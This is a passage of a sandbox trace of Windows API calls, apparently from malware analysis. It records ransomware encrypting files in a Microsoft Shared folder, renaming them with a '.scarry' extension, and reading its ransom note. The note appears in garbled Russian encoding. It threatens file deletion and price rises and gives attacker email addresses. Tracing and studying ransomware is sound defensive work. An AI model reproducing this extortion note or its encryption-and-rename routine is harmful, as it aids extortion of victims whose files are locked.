lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0110.416] CharLowerBuffW (in: lpsz="CGMIMP32.FLT", cchLength=0xc | out: lpsz="cgmimp32.flt") returned 0xc [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", 
cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0110.416] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ace8, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0110.416] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", lpUsedDefaultChar=0x0) returned 67 [0110.417] CharLowerBuffW (in: lpsz=".FLT", cchLength=0x4 | out: lpsz=".flt") returned 0x4 [0110.417] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".flt", cchWideChar=4, lpMultiByteStr=0x18dd64, 
cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".fltShared\\GRPHFLT\\CGMIMP32.FLT", lpUsedDefaultChar=0x0) returned 4 [0110.417] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 0x58b060 [0110.417] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0110.417] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0110.417] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0110.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", dwFileAttributes=0x20) returned 1 [0110.448] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0110.448] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0110.448] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x4f160 [0110.448] SetFilePointer (in: 
hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0110.448] ReadFile (in: hFile=0x19c, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x4000, lpOverlapped=0x0) returned 1 [0110.452] GlobalLock (hMem=0x450004) returned 0x591988 [0110.452] GlobalLock (hMem=0x45000c) returned 0x597998 [0110.456] GlobalHandle (pMem=0x597998) returned 0x45000c [0110.456] GlobalUnlock (hMem=0x45000c) returned 0 [0110.456] GlobalReAlloc (hMem=0x45000c, dwBytes=0x4000, uFlags=0x2) returned 0x45000c [0110.456] GlobalLock (hMem=0x45000c) returned 0x597998 [0110.456] GlobalHandle (pMem=0x597998) returned 0x45000c [0110.456] GlobalUnlock (hMem=0x45000c) returned 0 [0110.456] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0110.456] GlobalLock (hMem=0x45000c) returned 0x597998 [0110.456] GlobalHandle (pMem=0x591988) returned 0x450004 [0110.456] GlobalUnlock (hMem=0x450004) returned 0 [0110.456] GlobalHandle (pMem=0x597998) returned 0x45000c [0110.456] GlobalUnlock (hMem=0x45000c) returned 0 [0110.457] GlobalLock (hMem=0x45000c) returned 0x591988 [0110.457] GlobalHandle (pMem=0x591988) returned 0x45000c [0110.457] GlobalUnlock (hMem=0x45000c) returned 0 [0110.457] GlobalReAlloc (hMem=0x45000c, dwBytes=0x6000, uFlags=0x2) returned 0x45000c [0110.457] GlobalLock (hMem=0x45000c) returned 0x591988 [0110.457] GlobalHandle (pMem=0x591988) returned 0x45000c [0110.457] GlobalUnlock (hMem=0x45000c) returned 0 [0110.457] ReadFile (in: hFile=0x19c, lpBuffer=0x1e4d360, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e4d360*, lpNumberOfBytesRead=0x18ea34*=0x18, lpOverlapped=0x0) returned 1 [0110.458] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) 
returned 0x0 [0110.458] WriteFile (in: hFile=0x19c, lpBuffer=0x1e79f08*, nNumberOfBytesToWrite=0x4018, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesWritten=0x18ea30*=0x4018, lpOverlapped=0x0) returned 1 [0110.458] SetFilePointer (in: hFile=0x19c, lDistanceToMove=323936, lpDistanceToMoveHigh=0x18ea28*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea28*=0) returned 0x4f160 [0110.458] WriteFile (in: hFile=0x19c, lpBuffer=0x1e4d360*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e4d360*, lpNumberOfBytesWritten=0x18ea30*=0x18, lpOverlapped=0x0) returned 1 [0110.461] WriteFile (in: hFile=0x19c, lpBuffer=0x18eaac*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x18eaac*, lpNumberOfBytesWritten=0x18ea30*=0x8, lpOverlapped=0x0) returned 1 [0110.461] WriteFile (in: hFile=0x19c, lpBuffer=0x1ea1d38*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d38*, lpNumberOfBytesWritten=0x18ea30*=0x1, lpOverlapped=0x0) returned 1 [0110.983] WriteFile (in: hFile=0x19c, lpBuffer=0x1e79fd8*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x18ea30, lpOverlapped=0x0 | out: lpBuffer=0x1e79fd8*, lpNumberOfBytesWritten=0x18ea30*=0x9c, lpOverlapped=0x0) returned 1 [0110.983] CloseHandle (hObject=0x19c) returned 1 [0111.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7e018, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="pB1C1OiGbnLtERXMa2Ur8tni8FwIIIaO.scarry") returned 39 [0111.084] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\pB1C1OiGbnLtERXMa2Ur8tni8FwIIIaO.scarry" (normalized: "c:\\program files\\common 
files\\microsoft shared\\grphflt\\pb1c1oigbnlterxma2ur8tni8fwiiiao.scarry")) returned 1 [0111.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\pB1C1OiGbnLtERXMa2Ur8tni8FwIIIaO.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\pb1c1oigbnlterxma2ur8tni8fwiiiao.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0111.085] SetFileTime (hFile=0x19c, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0111.085] CloseHandle (hObject=0x19c) returned 1 [0111.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\pB1C1OiGbnLtERXMa2Ur8tni8FwIIIaO.scarry", dwFileAttributes=0x20) returned 1 [0111.086] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0111.086] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.086] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.086] GlobalUnlock (hMem=0x45000c) returned 0 [0111.086] GlobalLock (hMem=0x45000c) returned 0x591988 [0111.086] GlobalLock (hMem=0x450004) returned 0x593998 [0111.086] GlobalHandle (pMem=0x591988) returned 0x45000c [0111.086] GlobalUnlock (hMem=0x45000c) returned 0 [0111.086] GlobalHandle (pMem=0x593998) returned 0x450004 [0111.086] GlobalUnlock (hMem=0x450004) returned 0 [0111.086] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. 
\r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0111.087] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0111.087] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå 
ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe872300, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xfe872300, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xfe872300, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0xdf9, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", cAlternateFileName="D407~1.TXT")) returned 0x58b060 [0111.087] FileTimeToLocalFileTime (in: lpFileTime=0x18eb30, lpLocalFileTime=0x18eab0 | out: lpLocalFileTime=0x18eab0) returned 1 [0111.087] FileTimeToDosDateTime (in: lpFileTime=0x18eab0, lpFatDate=0x18eafe, lpFatTime=0x18eafc | out: lpFatDate=0x18eafe, lpFatTime=0x18eafc) returned 1 [0111.087] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0111.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.087] 
SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0xdf9 [0111.087] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ed04*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ed04*=0) returned 0x0 [0111.087] ReadFile (in: hFile=0x19c, lpBuffer=0x1e7ad38, nNumberOfBytesToRead=0xdf9, lpNumberOfBytesRead=0x18ed28, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesRead=0x18ed28*=0xdf9, lpOverlapped=0x0) returned 1 [0111.088] CloseHandle (hObject=0x19c) returned 1 [0111.088] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 1 [0111.088] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0111.088] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0111.088] GlobalLock (hMem=0x450004) returned 0x591988 [0111.088] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.088] GlobalUnlock (hMem=0x450004) returned 0 [0111.088] GlobalLock (hMem=0x450004) returned 0x591988 [0111.088] GlobalLock (hMem=0x45000c) returned 0x593998 [0111.088] GlobalHandle (pMem=0x591988) returned 0x450004 [0111.088] GlobalUnlock (hMem=0x450004) returned 0 [0111.088] GlobalHandle (pMem=0x593998) returned 0x45000c [0111.088] GlobalUnlock (hMem=0x45000c) returned 0 [0111.088] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0111.089] CharLowerBuffW (in: lpsz="CGMIMP32.FNT", cchLength=0xc | out: lpsz="cgmimp32.fnt") returned 0xc [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ní\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", 
cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0111.089] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txtXT\x18\x03") returned 36 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", lpUsedDefaultChar=0x0) returned 67 [0111.089] CharLowerBuffW (in: lpsz=".FNT", cchLength=0x4 | out: lpsz=".fnt") returned 0x4 [0111.089] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".fnt", cchWideChar=4, lpMultiByteStr=0x18dd64, 
cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".fntShared\\GRPHFLT\\CGMIMP32.FNT", lpUsedDefaultChar=0x0) returned 4 [0111.090] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 0x58b060 [0111.090] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0111.090] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0111.090] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0111.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", dwFileAttributes=0x20) returned 1 [0111.091] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 